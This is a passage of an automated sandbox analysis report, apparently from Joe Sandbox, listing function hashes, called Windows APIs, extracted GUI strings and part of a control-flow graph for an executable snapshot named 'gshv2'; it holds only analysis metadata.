                              • Instruction ID: af370d5f22f52f159ca64d097d91bb9706c79626557eccc469d5b8e4ad6af16a
                              • Opcode Fuzzy Hash: 404da5d8976d1f65c74cf5ca0df8bafecf5892086a85a90f0d541670af353162
                              • Instruction Fuzzy Hash: 22117C32A04F028AEF10DF60EC442A833A4FB5DB68F041A31EA9D82794DF3CD5A58340
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: mouse_event
                              • String ID:
                              • API String ID: 2434400541-0
                              • Opcode ID: de64ebb972d2a14c0cc8d54fb917160ab398f0b86f0d46df641b576cd2a03e6d
                              • Instruction ID: 93b7e7e907cd57a1cd39e6ec68d632b23b55db3444fd97c8a6faf8fbb461182c
                              • Opcode Fuzzy Hash: de64ebb972d2a14c0cc8d54fb917160ab398f0b86f0d46df641b576cd2a03e6d
                              • Instruction Fuzzy Hash: 4741E212D28B9D81E523A33F68017A6A6915FBE259E1CD733FE58B14E0EF1E72D18601
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID: #SCROLLX$#SCROLLY
                              • API String ID: 0-350977493
                              • Opcode ID: 53bbe513d6043a045ccfb63609f901d86e2d04d49f32a0eb9675648861bb7206
                              • Instruction ID: 6764da2d5049e584cb11f6cd29e5c4969dba0c4ed66882e2b7ce2c43a82d39ff
                              • Opcode Fuzzy Hash: 53bbe513d6043a045ccfb63609f901d86e2d04d49f32a0eb9675648861bb7206
                              • Instruction Fuzzy Hash: E712E633D18B8D86E612CB3784411B9B350FFBF394F189B22FE44765A6DF26B5919A00
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d42a1b31f9bd6ee6d1fd2feccca42872808724cb3d7c468e2db4ab3fe56b7035
                              • Instruction ID: 76a28ddb60ea27548f6c35a55bfda64a951130a1c6e562ecd4546d3ed339995a
                              • Opcode Fuzzy Hash: d42a1b31f9bd6ee6d1fd2feccca42872808724cb3d7c468e2db4ab3fe56b7035
                              • Instruction Fuzzy Hash: D2F1E436908BC585EB21CB3698412FDB360FF99364F444331EA98A36E5DF3EE2559B01
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID: VUUU$VUUU
                              • API String ID: 0-3149182767
                              • Opcode ID: 0f8cecac8536b6d0cb46413152174230d91df9aa532cdd01f7b53e2bdcdaf0da
                              • Instruction ID: 8f110b94384e8a928b3531e6053b1900516f611975eb438275859b23a799ecac
                              • Opcode Fuzzy Hash: 0f8cecac8536b6d0cb46413152174230d91df9aa532cdd01f7b53e2bdcdaf0da
                              • Instruction Fuzzy Hash: 23C1C633E10F889AE711CB3AD4415ED7361FF6A798714A322FA08736A5DF349691DB80
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: freemalloc
                              • String ID:
                              • API String ID: 3061335427-0
                              • Opcode ID: faf3b7368253874c9ffcba96a518e5b659a5afacd4e08c0bf914dc2a8f8f4d1e
                              • Instruction ID: e45432b4d5b3f04ec6040fcb382e6bfcbe1697a82c6f39a7c5140c2f59217a63
                              • Opcode Fuzzy Hash: faf3b7368253874c9ffcba96a518e5b659a5afacd4e08c0bf914dc2a8f8f4d1e
                              • Instruction Fuzzy Hash: CFA1F332A186C586DB21CB3AD8013B9B760FF9A795F04D331DA4DA3766EF39E0458705
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID: #COLLAPSE
                              • API String ID: 0-1971961705
                              • Opcode ID: 20704602c30e8f7d14693f2bf7996d2b8e19796cd929c65679a8339519f00479
                              • Instruction ID: 761830e5e213b91d4d50fa989a9d687d4b707d41f8db3c9aef478cedcba9ec6b
                              • Opcode Fuzzy Hash: 20704602c30e8f7d14693f2bf7996d2b8e19796cd929c65679a8339519f00479
                              • Instruction Fuzzy Hash: B382E933E14B859BD71ACB3789412E9B7A0FF99354F088735DB68A75A1DF35B0A08B01
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 7768ee70df9f1be6c6be9d15398015b0a2e38ea12b7b6868443f5c03073a7df7
                              • Instruction ID: 2ed9244ba3aacb8b8f8383a86dd94c05fd0cc15d7c322b6f952674722c12f359
                              • Opcode Fuzzy Hash: 7768ee70df9f1be6c6be9d15398015b0a2e38ea12b7b6868443f5c03073a7df7
                              • Instruction Fuzzy Hash: A7423C36B04A8586EB10CF6AD8846AD77B0FB88F94F158232DE4D93B64CF3AD545CB01
                              Strings
                              • ..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X..., xrefs: 00007FF62C0BFD99
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID: ..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...
                              • API String ID: 0-3803095028
                              • Opcode ID: 218a0e5558113a225ca9cbe391981ab1577581ea511b89db67796e9e99ca6975
                              • Instruction ID: 5c9e3ec041f9dab4fe580bedab39567d7e534cfce9bc5aff2fb2e1b8a7c4bccd
                              • Opcode Fuzzy Hash: 218a0e5558113a225ca9cbe391981ab1577581ea511b89db67796e9e99ca6975
                              • Instruction Fuzzy Hash: ADD124733046C885DB50CB29D8C5A7CBBA6F394B41B4AC536DF89823A1EB3EC45AD350
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: d7adb221d5b1c7e5067e8f62bb95bc6066cdbedf7a24165e5a61d5a7fc50765e
                              • Instruction ID: ccc273832dd3d211a2a888b73492bb1164c43becc7366409b637c8c5629740bd
                              • Opcode Fuzzy Hash: d7adb221d5b1c7e5067e8f62bb95bc6066cdbedf7a24165e5a61d5a7fc50765e
                              • Instruction Fuzzy Hash: EC615DA3A1C2E602DB968B3C6C5127D6EE0F749354F1C9234FE8AC2B85CE3ED505C642
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 8eed4aab18b5d89a036806fca9f100d2c91603a7416674e8dc2189e501d6239e
                              • Instruction ID: 8183778c6b8cc978aa98b553e870c3e7112c6d2debfb7f97e5dff34dde8c44fe
                              • Opcode Fuzzy Hash: 8eed4aab18b5d89a036806fca9f100d2c91603a7416674e8dc2189e501d6239e
                              • Instruction Fuzzy Hash: A661E873B1C6E186DB158B38E805A79BEE4E79A314F498275DA8CC3A49DE2FD401C701
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3e9a0bf960e819e35033acc633f5680460bcfd59f40b907fbf38096adb97bafd
                              • Instruction ID: 7431a222343100e997515d506dc73a7a7aeaeebc96d3c37710a9b291351de4ae
                              • Opcode Fuzzy Hash: 3e9a0bf960e819e35033acc633f5680460bcfd59f40b907fbf38096adb97bafd
                              • Instruction Fuzzy Hash: 09F10723D28B8D45E623D73748425B9B250AFBF394F1DEB22FD48715B2DF297181AA10
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9a0ac2a9af8508545b889fea58bc9f2bbe78c257fe82df19433fbb8e3e8bc75b
                              • Instruction ID: d5714ac0e94c3151d2c0829addb2f5661a6eee20932499d11fa3d270d94f4f74
                              • Opcode Fuzzy Hash: 9a0ac2a9af8508545b889fea58bc9f2bbe78c257fe82df19433fbb8e3e8bc75b
                              • Instruction Fuzzy Hash: 89F108B2A0878586EB55CF3288406F973A0FF55FA8F0C8635DE4CA7295EF3AA444C751
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: floorf$ceilf$memset
                              • String ID:
                              • API String ID: 2375660335-0
                              • Opcode ID: 9c8ab991e7f5f617ffc01fe6062675e96fd093031b5f8cb3fa02ab2643b98122
                              • Instruction ID: 36a70b0604b806892d7b6cb7721c00d119d88c12e6b8d23f405516d053f5f6f8
                              • Opcode Fuzzy Hash: 9c8ab991e7f5f617ffc01fe6062675e96fd093031b5f8cb3fa02ab2643b98122
                              • Instruction Fuzzy Hash: 02E1E333A18A9086D325CB35D4416BDB7A0FF9D794F058326FB89A3658EB3CE591CB00
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9735ea7b2be2e9c5a6772eaefec726a9bb04cf68889cd24a3d141d0ac0cbec37
                              • Instruction ID: 2560b316ab2cd4b7631a81e67f656b4393f40d5114bda794caa7ca86ff3ad43c
                              • Opcode Fuzzy Hash: 9735ea7b2be2e9c5a6772eaefec726a9bb04cf68889cd24a3d141d0ac0cbec37
                              • Instruction Fuzzy Hash: 9BE1CA33C0C78D85E652973748421B8B350AFBE765F1CDB32EA48B60B1EF2A75859603
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0a3f36570f85c2238c854589cc2ee0b6e171a9191c84a99dd0cd0bc83fa3fd14
                              • Instruction ID: f4810cecbd7af69961b10dae61f8ec4a58490b6229695311fa643973e7e82790
                              • Opcode Fuzzy Hash: 0a3f36570f85c2238c854589cc2ee0b6e171a9191c84a99dd0cd0bc83fa3fd14
                              • Instruction Fuzzy Hash: E6A10673D0924A45EF5B973758423B86650AFAA790F28CB36DF08B6491DF2B70D44B03
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70f8022893f4e9f8fc02ab15a839f37ae4ed80ed91b8abbfc294aff9ea974759
                              • Instruction ID: 9e36eb3bb5b887133d61bb7654659a6a065aededc892ea48f178e3f9c3a8f896
                              • Opcode Fuzzy Hash: 70f8022893f4e9f8fc02ab15a839f37ae4ed80ed91b8abbfc294aff9ea974759
                              • Instruction Fuzzy Hash: DFA1D233A18A98CAE701DF3E94412BDB7B0FB48399F144225EF8963665DF39B585CB00
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                              • Instruction ID: cc5cad956dec079ce3ce97275aa9f6e0b8fb38d8ee053daf5492b4d82fae6baf
                              • Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                              • Instruction Fuzzy Hash: 4851EBA6B244B147DE50CF2AD8815BC3791E345B53FE48476D65DC2F51CA2EC10ADF21
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 83e64e682ec1f794001b1b404ba3f0b3273a8fcaaef219915f658c7d4be8d4dd
                              • Instruction ID: 808011916b1b2b2ed40502be4eae3ae5be1ea0827f29bbd3d38abb26642c8ac2
                              • Opcode Fuzzy Hash: 83e64e682ec1f794001b1b404ba3f0b3273a8fcaaef219915f658c7d4be8d4dd
                              • Instruction Fuzzy Hash: 7641E631A0D34941FD2187235980B7D6251EF6A794F18C732DD9C63BC4DF3AE581D682
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 386e57bee0f0d2b45f17089fc473765588494f963e9afe0e7ba8e99d7e83554b
                              • Instruction ID: b427a8e1f45fefc5d23455d4545f8f53496d106a362509e09025dbb5a5110b3b
                              • Opcode Fuzzy Hash: 386e57bee0f0d2b45f17089fc473765588494f963e9afe0e7ba8e99d7e83554b
                              • Instruction Fuzzy Hash: 9431F93773469647EF4C8734ED22B782691E389341FC9A539EE5EC66C1DB2DD4518302
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ca523bfe88f2caad33b5de9b86c66ae7e317bf4edfc0c40f5e71ad535e4a84b6
                              • Instruction ID: 4849c7b9a8df1ab7dd34f08a52c01b9e3e7b0f17cca3781077851781bb8c5e0f
                              • Opcode Fuzzy Hash: ca523bfe88f2caad33b5de9b86c66ae7e317bf4edfc0c40f5e71ad535e4a84b6
                              • Instruction Fuzzy Hash: C2A0022990EC03D0EE448B00ED508302330FB74724B50C032C20ED20609F3EE840C342

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 562 7ff62c0a6770-7ff62c0a678d 563 7ff62c0a678f-7ff62c0a6793 562->563 564 7ff62c0a67cd-7ff62c0a67da 562->564 563->564 567 7ff62c0a6795-7ff62c0a67a2 563->567 565 7ff62c0a67e0-7ff62c0a67ec 564->565 566 7ff62c0a6d4c-7ff62c0a6d5c 564->566 568 7ff62c0a67ee-7ff62c0a67f5 565->568 569 7ff62c0a6811-7ff62c0a681b 565->569 567->564 570 7ff62c0a67a4-7ff62c0a67b6 call 7ff62c0b2720 567->570 568->569 571 7ff62c0a67f7-7ff62c0a67fe 568->571 572 7ff62c0a681d-7ff62c0a6825 569->572 573 7ff62c0a687c-7ff62c0a6886 569->573 580 7ff62c0a67be-7ff62c0a67c8 free 570->580 581 7ff62c0a67b8 570->581 577 7ff62c0a6805 call 7ff62c0b1580 571->577 578 7ff62c0a6830-7ff62c0a683e 572->578 575 7ff62c0a68b4-7ff62c0a68be 573->575 576 7ff62c0a6888-7ff62c0a6899 573->576 584 7ff62c0a68c0-7ff62c0a68d1 575->584 585 7ff62c0a68ec-7ff62c0a68f6 575->585 582 7ff62c0a68a1-7ff62c0a68ad free 576->582 583 7ff62c0a689b 576->583 586 7ff62c0a680a 577->586 587 7ff62c0a6840-7ff62c0a6852 call 7ff62c0b2870 578->587 588 7ff62c0a6869-7ff62c0a6875 578->588 580->564 581->580 582->575 583->582 590 7ff62c0a68d3 584->590 591 7ff62c0a68d9-7ff62c0a68e5 free 584->591 592 7ff62c0a6924-7ff62c0a6935 585->592 593 7ff62c0a68f8-7ff62c0a6909 585->593 586->569 604 7ff62c0a6854 587->604 605 7ff62c0a685a-7ff62c0a6864 free 587->605 588->578 589 7ff62c0a6877 588->589 589->573 590->591 591->585 598 7ff62c0a6963-7ff62c0a696d 592->598 599 7ff62c0a6937-7ff62c0a6948 592->599 595 7ff62c0a6911-7ff62c0a691d free 593->595 596 7ff62c0a690b 593->596 595->592 596->595 602 7ff62c0a696f-7ff62c0a6980 598->602 603 7ff62c0a699b-7ff62c0a69cf 598->603 600 7ff62c0a6950-7ff62c0a695c free 599->600 601 7ff62c0a694a 599->601 600->598 601->600 606 7ff62c0a6982 602->606 607 7ff62c0a6988-7ff62c0a6994 free 602->607 608 7ff62c0a69d1-7ff62c0a69e2 603->608 609 7ff62c0a69fd-7ff62c0a6a07 603->609 604->605 605->588 606->607 607->603 610 7ff62c0a69e4 608->610 611 7ff62c0a69ea-7ff62c0a69f6 free 608->611 612 7ff62c0a6a35-7ff62c0a6a3f 609->612 613 7ff62c0a6a09-7ff62c0a6a1a 609->613 610->611 611->609 616 7ff62c0a6a41-7ff62c0a6a52 612->616 617 7ff62c0a6a6d-7ff62c0a6a77 612->617 614 7ff62c0a6a22-7ff62c0a6a2e free 613->614 615 7ff62c0a6a1c 613->615 614->612 615->614 618 7ff62c0a6a54 616->618 619 7ff62c0a6a5a-7ff62c0a6a66 free 616->619 620 7ff62c0a6aa5-7ff62c0a6aaf 617->620 621 7ff62c0a6a79-7ff62c0a6a8a 617->621 618->619 619->617 624 7ff62c0a6ab1-7ff62c0a6ac2 620->624 625 7ff62c0a6add-7ff62c0a6ae9 